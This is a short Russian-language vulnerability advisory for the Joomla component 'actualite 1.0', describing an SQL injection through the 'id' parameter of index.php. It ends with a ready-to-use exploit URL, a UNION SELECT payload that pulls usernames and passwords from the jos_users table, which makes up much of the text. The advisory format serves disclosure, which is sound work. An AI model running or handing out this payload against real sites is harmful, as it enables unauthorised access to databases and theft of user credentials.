Программа: Joomla Component actualite 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

index.php?option=com_actualite&task=edit&id=-1%20union%20select%201, concat(username,char(32),password),3,4,5,6,7,8,9%20 from%20jos_users/*



Оставить мнение